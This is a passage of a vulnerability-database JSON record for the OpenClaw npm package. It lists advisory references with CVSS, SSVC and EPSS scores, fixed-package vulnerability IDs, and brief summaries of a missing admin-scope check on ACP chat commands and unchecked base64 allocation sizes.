"https://github.com/openclaw/openclaw/commit/dbfcef319618158fa40b31cdac386ea34c392c0c", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T13:49:24Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/dbfcef319618158fa40b31cdac386ea34c392c0c" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/62660", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/62660" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7wv4-cc7p-jhxc", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T13:49:24Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7wv4-cc7p-jhxc" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43531", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43531" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-workspace-env-file", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T13:49:24Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-workspace-env-file" }, { "reference_url": "https://github.com/advisories/GHSA-7wv4-cc7p-jhxc", "reference_id": "GHSA-7wv4-cc7p-jhxc", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7wv4-cc7p-jhxc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110121?format=api", "purl": "pkg:npm/openclaw@2026.4.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-k8x3-9pv7-rfax" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-rvcq-rqbq-4khp" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.9" } ], "aliases": [ "CVE-2026-43531", "GHSA-7wv4-cc7p-jhxc" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "7.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pdmd-a4fg-8fcg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91444?format=api", "vulnerability_id": "VCID-pgdr-mvc3-2kg3", "summary": "OpenClaw's mutating internal ACP chat commands missed operator.admin scope enforcement\n## Summary\nMutating internal ACP chat commands missed the operator.admin gate that should separate read-only and mutating control-plane actions.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `229426a257e49694a59fa4e3895861d02a4d767f`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/auto-reply/reply/commands-acp.ts now requires operator.admin for mutating internal ACP actions.\n- src/auto-reply/reply/commands-acp.test.ts ships regression coverage for non-admin denial and admin success cases.\n\nOpenClaw thanks @tdjackey for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/229426a257e49694a59fa4e3895861d02a4d767f", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/229426a257e49694a59fa4e3895861d02a4d767f" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3w6x-gv34-mqpf", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3w6x-gv34-mqpf" }, { "reference_url": "https://github.com/advisories/GHSA-3w6x-gv34-mqpf", "reference_id": "GHSA-3w6x-gv34-mqpf", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3w6x-gv34-mqpf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "GHSA-3w6x-gv34-mqpf" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pgdr-mvc3-2kg3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89157?format=api", "vulnerability_id": "VCID-psms-gauf-tkbz", "summary": "OpenClaw: Multiple Code Paths Missing Base64 Pre-Allocation Size Checks\n## Impact\n\nMultiple Code Paths Missing Base64 Pre-Allocation Size Checks.\n\nSeveral base64 decode paths could allocate before enforcing decoded-size limits.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=v2026.4.2`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @zsxsoft and @KeenSecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42420", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.16229", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.16177", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.1622", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42420" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-ccx3-fw7q-rr2r", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-ccx3-fw7q-rr2r" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42420", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42420" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-improper-base64-decoding-size-validation", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-improper-base64-decoding-size-validation" }, { "reference_url": "https://github.com/advisories/GHSA-ccx3-fw7q-rr2r", "reference_id": 